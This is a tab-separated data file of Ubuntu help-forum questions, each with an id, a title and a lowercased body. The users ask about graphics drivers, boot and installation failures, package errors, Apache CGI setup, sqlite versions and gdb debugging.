443290	if not manually launching with bumblebee , are nvidia drivers irrelevant to display problems ?	i have a dell xps 17 l702x with an nvidia optimus card . i have installed bumblebee . is the following correct ? if i do n't manually launch a program with optirun or primusrun , then bumblebee is not operational . if bumblebee is not operational , then any installed nvidia drivers are not being used . background : i am trying to work out some problems with kubuntu 14.04 and opengl . i 'm trying to work out if it 's worth testing different nvidia drivers .
443293	stop screen dimming after 60 seconds ( macbook running 12.04 )	i 'm running ubuntu 12.04 on a macbook air - everything works fine , apart from the fact that the screen dims after 60 seconds of activity . is there any way to stop this ? my computer is on mains power . if i stop using the machine , after 30 seconds the keyboard backlight turns off ( that 's fine ) . after a minute , the screen dims by about 50 % - this is annoying , especially when watching a video or reading a long page of text . my `` brightness and lock '' settings seem fine : i 've tried gsettings set org.gnome.settings-daemon.plugins.power idle-dim-time 600 but that does n't make a difference - it still dims after 60 seconds , no matter what value i set it to . i 've also used gconf-editor but i do n't appear to have /apps/gnome-power-manager/backlight i 'm not using unity - just the standard gnome desktop . is there any way to change this behaviour ? i never want my screen to dim . i 'm quite happy controlling it manually with the f1 and f2 keys . edit no - caffeine does n't work . the screen still dims . no - changing the dpms does n't work . no - editing stuff in dconf does n't work . no - i do n't have any other power manager software installed .
443298	problems with nvidia graphics driver ( 6600gt )	i just recently installed ubuntu 12.04 , and i am new to linux . after my first attempt , the system crashed and ubuntu would not start , not even in recovery mode with low graphics . the error message said something about lightdm display manager . this is what i did that resulted in the crash : first i ran the additional drivers program and activated the recommended graphics driver ( i think it was nvidia version 304 . the other choices were version 173 and version 304-updates ) . i have a nvidia geforce 6600gt graphics card . now i probably should have restarted , but instead i installed chromium , then restarted . ubuntu crashes upon start as described above . i tried to repair it with some help from ubuntu forums , but no success . the cascade of error messages thrown at me when trying to remove the drivers ( or whatever i was trying to do ) said something about chromium . i reinstalled ubuntu and it is working fine , but i would like to install a graphics driver . i did try the nvidia version 173 , and it seemed ok , except that the startup and shutdown sceens look wierd , so i removed it . now the system says i have the gallium 0.4 on nv43 graphics driver . and now to my questions : 1-do i dare to try the 304 again ? or the 304 with updates version ? i do n't want to have to reinstall ubuntu again ... 2-could chromium had been the problem ? 3-what is `` gallium 0.4 on nv43 '' ? 4-how can i tell if the graphics driver i have is ok ? thanks for any help !
443299	fn key for touchpad xubuntu	i recently switched from ubuntu to xubuntu . all is well except for a single fn key that doesnt ' seem to work . i have an asus n56vz which has a huge touchpad . so i 'd like to disable it when i have a mouse plugged in , because i keep touching it with my palm and it annoys me to death . in ubuntu these shortcuts just worked out of the box , however for xubuntu this does n't seem to be the case for the touchpad . is there a configuration to enable this shortcut ( fn+f9 in my case ) or either a setting that automatically disables my touchpad when a mouse is plugged in ? thanks in advance .
443303	ide like atmel studio	i use atmel studio for programming atmel avr/arm microcontrollers which is like visual studio . it can fix and suggest words and i was wondering , is there any ide like that in ubuntu ? i also use eclipse and i was wondering , can eclipse do that ? and if so , how ? thanks sample image :
443304	running gradlew produces `` : no such file or directory ''	we are two developers running vagrant vms with ubuntu 12.04 installed . running ./gradlew to execute our build script works fine for me , but when he runs the same command he gets the error : : no such file or directory . i have googled this to the max but all solutions are related to running a 32-bit executable on a 64-bit system but we are running 32-bit ubuntu . since we do this immediately after creating the vm from a provisioning script , the machines should be identical . the only differences i can think of are external , he runs vagrant from windows while i run it from os x . any ideas ?
443309	what application is used to create screenshots with highlights ?	what application can i use to create such a screenshot with the highlighted sections ? the image is taken from a post of takkat .
443312	question about install ubuntu	today i tried to reinstall my ubuntu 12.04 lts through a usb flash , at first time i chose the default partition plan , then i found that there is no /home partition , and i think remount a /home is much more complex than installing again , apart from that , i also ran a few shell codes to test whether my wireless network adapter worked okay ( `` ping 127.0.0.1 '' . ) after that i repeat the installation , when it let me choose partition plan , i chose 'something else ' , deleted all partition and disparted again . having finished second time installing , i start my os and open terminal , clicked 'up ' , something strange happened , the history of my last time input still existed , and it seemed to be there forever . i had deleted all partition , the history of anything should have been deleted , why it had n't ? and where is it now ?
443319	ca n't boot win7 after installing ubuntu 12.04 how can i restore my win7 ?	i use flash disk to install my ubuntu 12.04 under win7 system , however i made a stupid mistake when i later know that i cant choose install ubuntu alongside with win7 ( should choose advanced mode ) , however , after installing successfully , i find win 7 option on booting page , but after i choose it i.the system told me to insert a win7 cd and choose 'restore ' option . ignore it to keep on , the mistake shows . and one more thing i can see files that originally in my d disk in win7 . i 'm rookie and do n't know what to do , i have read some questions related but can not follow . my intention is to find my files in win7 . i want to ask questions specifically : how to get back to win7 ? do i necessarily need to reinstall win7 and choose 'restore ' option ? whether files in win7 are erased ? what is i install ubuntu again and do the right step ? will it help ?
443321	triple booting with win8 and ubuntu 13.10 already dual booted	how can i triple boot ? i 've already dual booted windows 8.1 with ubuntu 13.10 but i ca n't find any tutorials on how to install mac osx after that . i could only find tutorials that work in a different installation order such as mac installed first , windows second and ubuntu last . any help would be nice .
443322	lightdm-session ca n't find the keystore file ( i moved it ) , where is configured that file location ?	so i 'm running 13.10 . for some reason i do not remember i have a keystore in a directory in my home . it appears that lightdm uses that keystore during login . so if i move the directory i am unable to login . xsession-errors says that lightdm-session ca n't open that file ( obviously since i moved it ) now i really want to move away that directory so i wish to tell lightdm the new location but i am unable to find the configuration files that contains that information . the output from xsession-error is /usr/sbin/lightdm-session : 24 : . : ca n't open copy/keystore/keystore_env as you can see is not a standard directory , probably i got asked where to put that file but i ca n't recall on which occasion a similar error is given by bash when i login to the console but at least i can login that way
443323	extend pbr_image volume	i am very new to linux , and got a message everytime i boot my computer . i have got a dual boot with windows 8.1 and ubuntu 13.10 the message i got : my partitions : so i have a backup partitions ( used in windows ) , can i use some gb of that and `` extend the pbr_image '' ?
443326	why is this animation using a blank window ?	i 've got a pretty simple problem . i want to use the magic lamp animation in compiz but it just wont work properly . if i restore a window , the animation is looking proper : but if i minimize it the animation is just not right : i 'm using ubuntu 12.04 ; gnome 3.4.2 ; the 3.8.9-38-generic kernel . if you need any other information just ask , i 'll supply it .
443328	how do i get my sound indicator back	i run xubuntu 13.10 on a lenovo s10 ideapad netbook . i have 200gb hdd space and 1gb of ram . i wanted to give ubuntu a second chance but i installed it using sudo apt-get install ubuntu-desktop i was able to purge it via a website to get back to a pure xubuntu . when i rebooted my volume shortcut on my keyboard did n't work so i re-installed pulse audio . now i logged on this morning and my sound indicator is missing . can i get it back ?
443332	seek help in failed ubuntu installation on hp touchsmart tx2	i tried to install ubuntu 12 on a hp touchsmart tx2 ( model # tx2-1014au ) , using the windows installer . the first boot was successful and i logged into ubuntu . however , i closed my laptop before proceeding to install the extra drivers . when i tried to boot up the laptop again , it failed , and there was no response on the screen . i also noticed that the hard-disk indication light was off , while it would normally blink when booting up and running windows os . i tried pressing f9/f10 in an attempt to go into config mode , without succes . some specifications of my computer : hp touchsmart tx2 amd turion-x2 ultra 4gb ram , 2.3ghz ati radeon graphics 320gb harddisk , partitioned into : - c drive of 286gb ( 227gb usable ) - d drive ( recovery drive ) of 11.3gb ( 1.76gb usable ) multitouch screen i was using windows 7 32bit before i tried to install ubuntu 12 can anyone please tell me what i can do in such a situation ? please let me know if i need to give more information .
443333	add strings to a file with commands	i need to add : user_xattr , acl , barrier=1 to my /etc/fstab file . is there a way to do this via the via shell script ? i only want to edit the '/ ' mount . here is what i have before i manually edit it : uuid=eb287d10-60a8-4a9a-9148-5f907fc7a8be / ext4 errors=remount-ro 0 1 here is what it looks like after i manually add the lines : uuid=eb287d10-60a8-4a9a-9148-5f907fc7a8be / ext4 user_xattr , acl , barrier=1 , errors=remount-ro 0 1 i know that the sed -i command will not work here because it only adds lines ... also script be run on multiple computers so it has to be able to `` know '' that the uuid will be different .
443335	how can ubuntu be made grayscale ?	i 'd like to make everything grayscale . the utility xcalib can be used to invert the colours displayed ( every colour displayed is changed to its compliment ) using the following command : xcalib -i -a how could i make the display grayscale ? could i desaturate in some way , for example ? thanks !
443339	running openemr on microsoft cloud	we want to run openemr on the ms cloud platform . we created a vm using ubuntu . to run openemr , mysql and apache or another php-capable webserver must be configured . openemr requires a number of webserver and php features these include : php index support ( ensure that index.php is in your index path in httpd.conf ) we can not find index.php or httpd.conf . do we have to do anything special for the ms cloud ? what is the best way to install your version to the ms cloud ? we selected vm then chose ubuntu but how to tailor it to setup the apache and mysql with things we need ?
443340	lost disk space after dd	i 've made a typo while doing : $ sudo dd if=/dev/zero bs=1mib of=/host/ubuntu/disks/root.disk conv=notrunc oflag=append count=2048 $ sudo losetup -c /dev/loop0/ $ sudo resize2fs /dev/loop0 in first command , so the rest could n't execute . i 'm new to ubuntu and i do n't know what happened to that 2gb 's . apparently they are lost . how can i return them ? here is my df : filesystem 1k-blocks used available use % mounted on /dev/loop0 17996772 12940340 4239864 76 % / udev 1665928 4 1665924 1 % /dev tmpfs 335100 876 334224 1 % /run none 5120 0 5120 0 % /run/lock none 1675496 376 1675120 1 % /run/shm /dev/sda1 110697468 102797320 7900148 93 % /host while the last one should have 2 gb 's more
443347	how do access my nokia lumia 520 ( windows phone ) on ubuntu ?	whenever i connect my nokia lumia 520 device via usb to ubuntu 12.10 , i get this error message : unable to mount nokia lumia 520 ( rm-914 ) unable to open mtp device ' [ usb:001,007 ] '
443348	ubuntu 12.04 not working after suspend	when trying to run my laptop after suspend . i have a black screen and nothing work . keyboard , mouse , touch bad . my pc : laptop dell inspiron 15 r ram :4 gb graphic card : advanced micro devices , inc. [ amd/ati ] sun xt [ radeon hd 8670a ] any help
443350	can i use unity web apps in ubuntu 13.10 ?	i 've learnt of the unity web apps and would like to use them in saucy , but i can figure out how . i cant seem to find any straight forward instruction .
443351	how to enable python cgi scripting on apache	please i need help configuring my apache2 for cgi scipt execution i added a the config below to my httpd.conf file and did a server restart < directory `` /var/www/html/spooler '' > allowoverride none addhandler cgi-script .py options +execcgi order allow , deny allow from all < /directory > < directory `` /var/www/html/spooler '' > options all < /directory >
443352	putting web links on the unity desktop	i have been trying to put a web link on my desktop . researching on this i have found that some urls can be just dragged and dropped . when you do this with others you get a copy of the web page not a link and there is a third group that gives you a could not display `` http whatever '' message . does anyone know the reason behind the three different results ?
443353	home folder not writeable	i have two users , and one of them ca n't write to his home directory ( but the desktop directory ? ! ) and thunar displays a lock on the home folder . however , if i run ls -l in /home , i get drwxr-xr-x 28 habefaro habefaro 4096 m채r 4 2013 habefaro drwxr-xr-x 22 psirus psirus 4096 apr 4 16:52 psirus so i ca n't see the difference ? ! btw , habefaro is the user who ca n't write to his home folder . edit : running sudo lsattr -d /home/habefaro gives -- -- i -- -- -- -- e -- habefaro/
443357	tools windows from system settings are visually messed up . 13.10	i use messed up because it 's hard to describe , check out this image for what i mean : each option in my system settings has the background removed like that . also if you notice the top bar is big and square as opposed to the normal rounded ubuntu 13.10 . for what it 's worth , i can not enable transparency in my terminal window either . the two issues started at the same time . i 've verified that my video drivers are loading properly . compiz is up to date and composite is enabled . the issue seemed to appear after the most recent system update .
443359	how to execute a program from anywhere in terminal	how could i execute a program which i downloaded from website and able to execute from $ home directory or anywhere in terminal ? thanks , peace
443362	how to open mdi files ?	does anybody know what package shall i download or what to do to open .mdi files on ubuntu 13.10 ? mdi : microsoft document imaging format
443363	how to install and use junit in eclipse juno ( ubuntu os )	i installed junit on my ubuntu system , using the commands below : sudo aptitude install junit export classpath= . : /usr/share/java/junit.jar how can i add it to eclipse ?
443368	is there an ubuntu package for pygobject demos ?	i know that there is a package for pygtk demos ( sudo apt-get install gtk2.0-examples ) but i ca n't found an equivalent one for pygobject .
443370	oracle-java8-installer results in `` apt '' removal ?	i have been been running trusty since the first alpha release , pulling daily updates . i also installed the oracle-java7-installer from the webupd8 ppa . today i noticed during a dist-upgrade that oracle-java7-installer was being removed . on my edge system i just allow all the defaults so i allowed the removal expecting to try out the java 8 version anyway . however when i went to install the oracle-java8-installer package it wanted to remove `` apt '' ! ? this obviously sparked my concern , as it even feels like a security concern . help understanding this would be greatly appreciated . $ sudo apt-get install oracle-java8-installer reading package lists ... done building dependency tree reading state information ... done suggested packages : visualvm ttf-baekmuk ttf-unfonts ttf-unfonts-core ttf-kochi-gothic ttf-sazanami-gothic ttf-kochi-mincho ttf-sazanami-mincho ttf-arphic-uming the following packages will be removed : apt apturl nautilus-share python3-software-properties software-center software-properties-common software-properties-gtk ubuntu-extras-keyring ubuntu-minimal unattended-upgrades the following new packages will be installed : oracle-java8-installer warning : the following essential packages will be removed . this should not be done unless you know exactly what you are doing ! apt 0 upgraded , 1 newly installed , 10 to remove and 0 not upgraded . need to get 18.7 kb of archives . after this operation , 7,838 kb disk space will be freed . you are about to do something potentially harmful . to continue type in the phrase 'yes , do as i say ! ' ? ]
443375	routing in ubuntu 12.04	i would like to know how to route to , what i want is that when i send a request to my machine for a specific port is automatically redirected me to another ip with specific port . any help would be appreciated .
443376	recovering very important lost data from external hard drive when copying it	i was trying to copy back up documents file on my external hd and something did n't work . when i went back to the external hd to retry the copy , the file was gone . how can i recover a file on an external hard drive that was deleted by accident ?
443377	ubuntu not starting after updating to 12.10	i updated from 12.04 to 12.10 and all went fine . after installation was finished , it said : `` you must restart your computer to finish update '' which i did . after reboot , i got into the boot menu and i choose ubuntu . then it went into a black screen , like a command prompt screen , and nothing more happened . what can i do about this error ?
443378	droid x not recognized	i can not import my music from my droid x onto the rhythm player . i shows the music that i have but will only play if connected to the usb port .
443379	sqlite header and source version mismatch	i had the ubuntu repositories of sqlite3 with v3.7.17 . but it does n't have the .save command as newer versions . to update i did : sudo apt-get purge sqlite3 download sqlite 3.8.4.3 install it with ./configure & & make & & sudo make install but now when i try to run sqlite3 from command line i get : sqlite header and source version mismatch 2013-05-20 00:56:22 118a3b35693b134d56ebd780123b7fd6f1497668 2014-04-03 16:53:12 a611fa96c4a848614efe899130359c9f6fb889c3 searching i found two solutions that i 've tried without success : this answer did n't work because i do n't have sqlite on /usr/bin this solution did n't work neither , but i did backup to revert those useless changes . any idea of how to solve this error ?
443380	arm chromebook crouton xfce precise . one too many desktops	running crouton xfce precise on arm chromebook . i seem to have set up 2 chroots . when using the ctrl/alt/shift/back key combo i cycle through chrome desktop , then 2 xfce/ubuntu desktops . the one i dont want also happens to be missing its taskbar and terminal/web/whatever quicklaunch bar . i tried typing something like sudo list-chroot as a shot in the dark ( i have no idea what im doing ) . i just want to get rid of the extra one .
443385	live-dvd of ubuntu 12.04/13.10 - system running low graphics mode error	i am getting this error when booting of a live-dvd image also . after installation my system hangs when i click the `` restart now '' button . then i hard reboot the system . then it says `` system running low graphics mode '' error . i am not getting any trouble with the first version of ubuntu 12.04 , it runs fine even after upgrading also . so some modification the canonical made between the initial release of 12.04 and now has resulted in my computer getting this error . i am getting similar error while installing lubuntu12.04 , linux mint also . my mother board is asus via a8v-mx with integrated graphics card . some one please help me with this issue . thanks .
443386	ltsp : how to update and install plugins for sbac	i just recently took over an ltsp lab ( edubuntu ) and now am in the middle of needing to install plugins and updating it . i have no idea how to do either . since i 've heard you need to update the image file , i do n't know how to do that . with all of the sbac/common core testing going on at the moment , apparently a certain type of question with a sound file that needs to be played , is n't working on our ltsp lab . the file does n't play nor will it start . i 've been told by sbac that i need to install two plugins , but they ca n't provide how to correctly update/install it on an ltsp image . `` hi matt , please follow the steps below to install festvial and sox plugins on the workstations and server . open terminal type : sudo apt-get update & & sudo apt-get install sox let it runs and wait for it to finish type : sudo apt-get update & & sudo apt-get install festival -let in runs and wait for it to finish i recommend to restart the machine then try to run the secure browser . let me know if this works . '' so that is my question . how do i update the edubuntu ltsp image and how do i correctly install those plugins ? a detailed guide or list of commands would be perfect .
443388	install error for gimp 2.8 repository in ubuntu 12.04	hi i 'm a linux newbie and am having some problems with installing gimp 2.8 . i previously installed gimp 2.6 onto my 64-bit ubuntu 12.04 machine using ubuntu software center . however , i recently tried out 2.8 and found that i like the changes and would like to install this version instead . so , i looked up how to install and tried the following method : uninstalled gimp 2.6 using the following methods : 1 ) uninstalled using software center ( and uninstalled all add-ons ) i have tried the following command-line actions as well : $ sudo apt-get remove gimp $ sudo apt-get autoremove gimp gimp-plugin-registry $ sudo apt-get purge gimp* it uninstalled fine , and was no longer listed as installed in software center . then i tried the standard method to install gimp via terminal : $ sudo add-apt-repository ppa : otto-kesselgulasch/gimp $ sudo apt-get update $ sudo apt-get install gimp this worked perfectly on my laptop , which now has gimp 2.8 installed and working great . however , on my desktop i ran into a problem at the first stage of trying to add the repository . upon the first step ( `` $ sudo add-apt-repository ppa : otto-kesselgulasch/gimp '' ) , i get the following error message in terminal : $ sudo add-apt-repository ppa : otto-kesselgulasch/gimp [ sudo ] password for daniel : traceback ( most recent call last ) : file `` /usr/bin/add-apt-repository '' , line 8 , in < module > from softwareproperties.softwareproperties import softwareproperties , expand_shortcut_line file `` /usr/lib/python2.7/dist-packages/softwareproperties/softwareproperties.py '' , line 53 , in < module > from ppa import addppasigningkeythread , expand_ppa_line file `` /usr/lib/python2.7/dist-packages/softwareproperties/ppa.py '' , line 31 , in < module > import pycurl importerror : libheimbase.so.1 : can not open shared object file : no such file or directory and then when i carry out the rest of the actions via terminal it installs the 2.6 version of gimp . both computers are running 64-bit ubuntu 12.04 lts . i did look into the libheimbase.so.1 file listed a bit ( it is in the /usr/lib/x86_64-linux-gnu directory ) and it seems like it is absent from my desktop ( which is the one having the problems ) but present on my laptop . i do n't know exactly why this problem exists , as i generally try to keep the two systems pretty similar- but it 's possible i accidentally uninstalled/removed this file on my desktop ( or never installed it ) . anyway , i was wondering what exactly is happening and how i can possibly fix this so i can install the gimp repository ( and thus gimp 2.8 ) on my desktop ? thank you !
443389	using a package from another distribution	i installed desmume on ubuntu 12.04 , but the latest version is only 0.9.7 and i want the speed boost from 0.9.9 . the only way i see is to compile the source code myself , which i try not to do as much as possible . now i noticed this a few times , that higher number of distributions have higher number of releases for lots of packages . is there no ppa that lets you use these packages anyway instead of having to find a workaround around this all the time . so i was wondering did i make a mistake installing 12.04 ? i do n't feel like i did , but if so many packages are outdated , should i upgrade ? anyway the original question was if there was a way to use the package from lets saucy or trusty in precise ?
443391	installation of ubuntu on nv57h94u gateway via usb : ubuntu runs , but wo n't install on hard drive because it ca n't find it	i ( mac user ) followed these instructions and am trying to use my usb drive to install ubuntu on a nv57h94u gateway computer . the computer was running windows 7 , but was reset to factory settings . i changed the boot order so that the computer booted from the usb , and this worked fine . if i click `` try ubuntu , '' i can use ubuntu . however , if i try to install it , i am told that i do n't have the required 4.5 gb available hard drive space . i went back , clicked `` try ubuntu , '' and used disk utility to determine that ubuntu is only able to see the usb drive it is running off of . does anyone know how to make it recognize the computer 's hard drive so that i could install ubuntu on it ? any help would be greatly appreciated . thanks for reading !
443392	can someone explain the working of this bash script ?	i found the following bash script which i would like to run , but i am not completely sure about what it is going to do . can someone explain the working of the following bash script ; i.e . what is it doing and how is it doing so ? echo - `` who are you looking for : `` read user if [ -n `` $ user '' ] then list=`w | grep $ user | cut -c19-30` if [ `` $ list '' ! = `` '' ] then echo `` the user $ user is logged in from $ list '' else echo `` the user $ user is not logged in now '' fi fi
443398	updating software	i recently have been shown just how new i am to ubuntu through this issue : i am using ubuntu 12.04 lts and i have installed hedgehogs version 0.9.17.1 using the ubuntu software center . i have n't been able to update to version 0.9.20.5 . as far as i understand it 's because that version is not on any repository that is known to my pc at this point . i 've searched all over the internet but i hesitated using any funny console-commands that may change files such as sources.list scince i am not completely familiar with all that . when i used lucid lynx i once managed to mess up everything concerning the software distribution system including apt-get , synaptic and the automatic updates by doing so , and no one could help me back then . i finally decided to just download these files from the hedgehogs homepage , including hedgewars_0.9.20.5-2.dsc hedgewars_0.9.20.5.orig.tar.bz2 hedgewars_0.9.20.5-2.debian.tar.gz this is where i got so far - i could not even follow the instructions included in the packages for i did n't want to punch any commands in the console , not really understanding them . as i said , i am quite inexperienced and i am glad if i get the latest hedgehogs-version running , but mostly i 'd be glad about any hint to get the big picture of what i 'm doing , so that i maybe can use the gained knowledge someday in a similar situation . thank you in advance
443403	can i turn off the power led in my netbook ?	i have a netbook lg x110 and i 'd like to turn off the light of its led power button , because his light bothers me in the night : is this possible ? thanks in advance !
443404	serious installation problems	i am trying to install ubuntu alongside windows . i downloaded the ubuntu 12.04 lts desktop installer , extracted it and ran the wubi.exe as an administrator . an error window opened , saying : `` the version of this file is not compatible with your windows version . '' the same error occurs when running directly from the iso file . i have windows 7 , 64 bit , with 8gb ram and i tried both the 32- and 64bit versions of ubuntu . when i installed ubuntu from the same files on my windows xp pc , everything worked perfectly .
443411	ubuntu 12.04 blocks bootable usb	today i installed ubuntu 12.04.4 lts on my brand new ideapad g580 . however , i discovered that i ca n't get my wifi to work , and i do n't have an ethernet cable to get an internet connection . this led me to downloading xubuntu 12.04 and hoping my wifi will work on that one . however , after i downloaded it and made a bootable usb , the usb wo n't boot . when using linux live creator i get an efi disk read error , and when using unetbooting i ca n't access the boot menu to change the booting disk . i am ready to provide any info you might need to help me solve any of these issues ( the other being my wifi not working , which is a common issue , but fixing it requires downloading the necessary files from a different computer and providing them via usb as most fixes include aptget ) . linux imroth 3.11.0-15-generic # 25~precise1-ubuntu smp thu jan 30 17:39:31 utc 2014 x86_64 x86_64 x86_64 gnu/linux imroth @ imroth : ~ $ lspci 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) 00:01.1 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm76 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 3d controller : nvidia corporation gf117m [ geforce 610m/710m / gt 620m/625m/630m/720m ] ( rev a1 ) 03:00.0 ethernet controller : qualcomm atheros ar8162 fast ethernet ( rev 10 ) 04:00.0 network controller : broadcom corporation bcm43142 802.11b/g/n ( rev 01 ) now that i think about it , would xubuntu do me any better ? as i understand it , it 's based on ubuntu ...
443412	problem during kernel configuration during installation	installation was about 75 % done , when it lingered on kernel configuration . i got a black screen full of code , ending with : [ 594.182790 ] init : lightdm main process ( 26464 ) terminated with status 1 what can be the problem ?
443414	why are glided and glideusd listenening on tcp ports 3490 and 3492 ?	ubuntu 12.04 lts dell factory pre-install on a precision m4800 . ~ $ sudo ufw show listening tcp : 3490 * ( glided ) 3492 * ( glideusd ) i believe these are related to the glidepoint touchpad , but why would touchpad stuff be listening on tcp ports ?
443415	howto make `` update-grub '' to ignore guest volumes on a kvm hypervisor ?	i have some ubuntus acting as a kvm hypervisor and , every time i run `` update-grub '' on those servers , it takes a lot of time to finish and makes too much disk io . i 'm seeing that it tries to find others o.s . but , each `` extra '' logical volume i have , belongs to my guests , there is no need to scan those volumes ... so , how can i configure update-grub to ignore some lvm2 logical volumes ? tks !
443418	start another gui on different tty	for some reason i want to have 2 guis open at different ttys . the commands sudo service lightdm stop/start will stop/create a new gui at tty7 . but how can i do the same at different ttys or redirect its output ?
443420	create jailed users using programing language	i want to create limited users in my system able to use only few commands . i read this question and jailkit is awesome and do what i want , except one thing creating the users dynamically ( via programming language ) . is there any method to create jailed users via programming language ? or i should invoke jailkit commands from my program ? ps : i believe every programming language should be able to do it . anyway i prefer nodejs or python .
443422	can the keysonic ksk-6001 keyboard work in ubuntu without pressing ctrl+shift+alt+n every time ?	i 've had this keyboard for quite a while and i can say i like it . the problem is ( according to this post ) the anti-ghosting feature which i do n't really need anyway . as said on the linked post , the temporary solution is to press ctrl+shift+alt+n to switch off the anti-ghosting feature , but is there a permanent solution ? obviously this is a minor issue but i 've seen other people here having this same question but never an answer ( positive or negative ) . anyone figured this out yet ?
443423	make custom iso image after i 've made customizations	i wanted to know how to make a custom iso image so others can just burn it on a disc or run from usb or something . so i would have all the packages install , software and other scripts already preconfigured on the image , but how do i take my custom image i have installed everything on and make it available for others via a iso
443425	requirements version for compiling a program ?	many of times on happen for me when i want to install a program in readme it says for example you need gcc or perl as requirement . bur do not say about the version of the requirements . at this time the only way is exam and test to know which one is work or better to say compatible . is there any trick or any experienceon ubuntu to avoid testing inorder to know which version of requirements is compatible ?
443427	can i install ubuntu touch on a huawei ascend p6 ?	i have a huawei ascend p6 phone and i want to install ubuntu touch . is my device supported by ubuntu touch ?
443428	destroyed windows partition	my sister was trying to install ubuntu on her laptop , on partitioning time she chose the automatic resize option , the problem is that now her windows partition is lost . i 'm not sure of the options she chose but after the installation i see she has lvm , her windows 8 was on a dynamic partition with 2 drives on windows and that partition was her whole 750 gb hard disk , it looks like ubuntu installer has removed the windows partition . is there any way i can restore her windows drives ? i think ubuntu has written the lvm on free parts of the windows partition . thanks in advance
443429	installing node.js in vm with proxy	i am running windows on a network that has a corporate authenticating proxy ( ntlm ) . i have setup cntlm and verified that it works fine with windows . i am using virtualbox and have installed ubuntu 13.10 . i also changed the network proxy settings to add my windows host as the http proxy . i am able to open firefox and browse the public internet using the ubuntu vm . when i turn off the proxy , i am unable to browse , so i know the proxy must be working and configured correctly . now , i 'm trying to install node.js : $ sudo apt-get install nodejs reading package lists ... done building dependency tree reading state information ... done e : unable to locate package nodejs $ when i try a sudo apt-get update , i see the following : 0 % [ connecting to archive.ubuntu.com ( 91.189.91.13 ) ] [ connecting to us.archive . and it just hangs there ... any guidance is appreciated .
443431	loading a proprietary disk driver into ubuntu server initramfs	i have a revodrive 3 x2 , and i am installing ubuntu on it . i followed the guide by alex burgess for a complete fresh copy . i also topped this guide ( which works perfectly when using the exact ubuntu and driver versions ) , with the command sudo apt-get install ubuntu-desktop . et voila ! i had a working ubuntu desktop on a super fast pci express ssd . wonderful ! the reason why ubuntu server had to be installed , is partly because the revodrive had a proprietary driver that they just pertinently refused to provide an easy linux variant for the desktop user . also partly , because i , along with many other users , have exhausted finding an other way for installing ubuntu . nonetheless , it works so far , and i am really , really happy . now i updated the system afterwards ( i didnt do anything else ) , and i got pretty much an error just like this user , where my revodrive disk was no longer found . upon further investigation , i could find now two folder entries in /lib/modules/ , ie 3.2.0-23-generic and 3.2.0-60-generic . when i rebooted and booted using the old 3.2.0-23-generic version , it worked perfectly again . going back to the guide , it seemed that the proprietary driver , ocz10xx.ko , was not added properly to initramfs , and i guess when the latest 3.2.0-60-generic was loading without this driver loaded , it could n't find the revodrive device sda , and hence crashed right there . so , how do i attempt adding this mod to this initramfs ? more importantly , how do i monitor that the driver was successfully added ( ie . that insmod , depmod , and update-initramfs commands ( i guess those are the key commands ) were all successfully adding the proprietary ocz10xx.ko driver to the latest initramfs ? if all that fails ; how does someone revert an old initramfs back to default loading in grub2 ?
443436	substituting values on the command line	i want to run sql from the command line : mysql -u user -p database -e `` insert into table values ( null , [ hash ] , now ( ) , 0 ) ; i want to replace [ hash ] with the response of another command line command : date + % s | md5sum is there a way to make that substitution ?
443441	video driver : works under 12.04 lts , does not under 13.10	recently i 've installed a 12.04 lts for one of my relatives . all seemed to work fine , except for flash player plugin within firefox . since that was `` mission-critical '' , i 've reinstalled the machine to run on 13.10 . after that , i can only reach the login screen , tried unity , gnome , no difference . i suspect the video card driver is faulty , so i 've gathered all info i could : fujitsu tech d1521 mainboard [ 173451003 ] kernel dirver in user : 1915 vga compatible controller [ 0300 ] intel corporation 828455g/gl [ brookdale-g ] /ge chipset integrated graphics device [ 8086:2562 ] natually i can log in to any other console but the graphical one . in 12.04 there was no problem with the install , i 've installed a virtual machine with 13.10 to ensure all works fine , but that was on a thinkpad using nvidia video card . on the target host , there is an integrated video card with the data posted above - the 12.04 could deal with it , the 13.10 version could not . is there a way to use 12.04 video driver in 13.10 ? any other workarounds to make 13.10 run on the host ? thank you all in advance for the help
443446	how can i recover the uuid after changing it ?	i changed the uuid of my hdd . is there any way to recover it ? . after changing it , the grub fails .
443447	ubuntu one software no longer works	when i open ubuntu one software it does not sync : pressing edit personal details online results in this dialog box : pressing edit your services online results in this page : with an addres which seems to be offline . pressing see details opens nowhere : what 's the problem ?
443449	gdb not showing c code when gcc -g option is used	i have a file called hello_world.c . i use the command gcc -g -wall hello_world.c then gdb ./a.out i set a breakpoint at line 27 and run , it tells me this : warning : no loadable sections found in added symbol-file system-supplied dso at 0x7ffff7ffa000 it does n't show me the actual c code being executed line by line , it shows me this when i break at l25 breakpoint 1 , 0x000000000040052f in main ( ) when i hit the breakpoint , and i use `` l '' 21 # include < stdlib.h > 22 # include < stdint.h > 23 24 int main ( int argc , char **argv ) { 25 int a = 0xcafef00d , b = 0x13aecee2 ; 26 27 printf ( `` the magic word is : % x\n '' , a + b ) ; 28 return exit_success ; 29 }
